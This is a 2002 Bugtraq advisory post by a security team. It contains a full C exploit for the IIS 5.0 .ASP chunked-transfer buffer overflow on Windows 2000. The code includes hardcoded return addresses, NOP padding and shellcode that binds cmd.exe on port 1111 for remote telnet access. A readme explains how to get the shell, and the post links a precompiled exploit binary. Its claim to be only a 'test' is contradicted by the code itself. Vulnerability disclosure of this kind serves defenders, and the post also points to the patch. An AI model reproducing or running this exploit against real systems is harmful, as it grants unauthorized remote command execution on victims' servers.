Windows 2000 Server IIS 5.0 .ASP Overflow Exploit
Date: 4 May 2002 15:42:52 -0000
From: CHINANSL Security Team <lovehacker@chinansl.com>
To: bugtraq@securityfocus.com
Subject: Windows 2000 Server IIS 5.0 .ASP Overflow Exploit
Summary:
========
The following code will allow you to safely test your
system for the below motioned vulnerability. For more
information about this vulnerability see
http://www.eeye.com/html/press/PR20020410.html previous
article:"windows 2000 and NT4 IIS .ASP Buffer Overflow".
The following code comes from CHINANSL TECHNOLOGY CO.,LTD.
For more information about our company see
http://www.chinansl.com.
Exploit:
========
--------------------CUT HERE--------------------------------
/*
Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD
http://www.chinansl.com
keji@chinansl.com
*/
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib,"Ws2_32")
int main(int argc, char* argv[])
{
if(argc != 4)
{
printf("%s ip port aspfilepath\n\n",argv
[0]);
printf(" ie. %s 127.0.0.1
80 /iisstart.asp\n",argv[0]);
puts(" programed by keji@chinansl.com");
return 0;
}
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
DWORD
jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6
\x01";///"\x0c\xfb\xe6\x01";
char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02
\x02" "PADP"; //16 bytes
WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
{
puts("WSAStartup() error");
return -1;
}
struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
{
puts("Socket create error");
return -1;
}
if(connect(s,(struct sockaddr *)&addr,sizeof(addr))
== -1)
{
puts("Cannot connect to the specified
host");
return -1;
}
char buff[4096];
char* shellcode=
"\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33
\xc9\x89"
"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65
\x6c\x33\x32"
"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32
\x2e\xab"
"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32
\xc0\x4f"
"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53
\xff\xd0\x89"
"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53
\xff\xd0"
"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75
\xfc\xff\xd3\x89"
"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6
\x66\xbe"
"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66
\xbe\x3e\x02\x56"
"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56
\xff\x75\xfc"
"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75
\xfc\xff\xd3\x89"
"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75
\xfc\xff\xd3\x89"
"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75
\xfc\xff\xd3\x89"
"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45
\xe0\x6a"
"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8
\xff\xd3"
"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3
\x89\x45"
"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13
\xff\x75\xf8"
"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45
\xc8\x6a"
"\x03\xff\x75\xf8\xff\xd3\x89\x85
\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0
\xab\xf7\xd0"
"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8
\xab\x33\xc0"
"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50
\xff\x55"
"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4
\x6a\x10"
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75
\xc4\xff"
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45
\xc0\x33"
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50
\xff\x55"
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45
\x94\x50"
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44
\x32\xc0"
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01
\x89\x47"
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89
\x47\x3c"
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85
\x38\xff"
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51
\x53\xff"
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34
\xff\xff\xff\x89"
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85
\x2c\xff\xff\xff\x50"
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85
\x2c\xff\xff\xff\x85"
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85
\x2c\xff\xff\xff\x50\x53"
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0
\x74\x6d"
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
\xff\xff\xff\xff"
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90
\x90\x90"
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90
\x33\xc0"
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0
\xff\x55\xc8"
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50
\x8d\x85"
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
\xff\xff"
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4
\xff\x75\xc4"
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95
\x1c\xff\xff\xff\x6a"
"\xff\xff\x95\x18\xff\xff\xff";
char* s1="POST ";// HTTP/1.1\r\n";
char* s2="Accept: */*\r\n";
char* s4="Content-Type: application/x-www-
form-urlencoded\r\n";
char* s5="Transfer-Encoding:
chunked\r\n\r\n";
char* sc="0\r\n\r\n\r\n";
char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;
char sendbuff[1024*16];
memset(sendbuff,0,1024*16);
sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %
s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%
s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j
mpaddr*/,sc);
int sendlen=strlen(sendbuff);
*(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;
result=send(s,sendbuff,sendlen,0);
if(result == -1 )
{
puts("Send shellcode error!");
return -1;
}
memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);
if(strstr(buff,"<html>") != NULL)
{
shutdown(s,0);
closesocket(s);
puts("Send shellcode error!Try again!");
return -1;
}
shutdown(s,0);
closesocket(s);
printf("\nUse <telnet %s 1111> to connect to the
host\n",destIP);
puts("If you cannot connect to the host,try run
this program again!");
return 0;
}
---------------------------End------------------------------
Readme:
=======
This .asp overflow exploit will open port 1111 and bind
the cmd.exe.One thing should be noted is that everytime you
run this exploit and a message will show that this exploit
works perfectly,but that doesn't mean you can get the
access to the target host,the reason is that on some
occasions there will be a message-box appear on victim's
terminal screen showing that an AV(Accesee Violation) has
occured.anyhow,this dialog should be closed by recipient
otherwise you can not gaining the access even if you
continue your attack.
Download:
=========
http://download.chinansl.com/aspexploit.exe
Solution:
=========
patch:http://www.microsoft.com/Downloads/Release.asp?
ReleaseID=37824
Reference:
==========
Copyright 2001-2002 CHINANSL. All Rights Reserved.
This Information comes from CHINANSL TECHNOLOGY
CO.,LTD. It can be transshipped. But please guarantee the
completion of the article, otherwise we will pursue the
rights of the law.
www.chinansl.com
lovehacker@chinansl.com
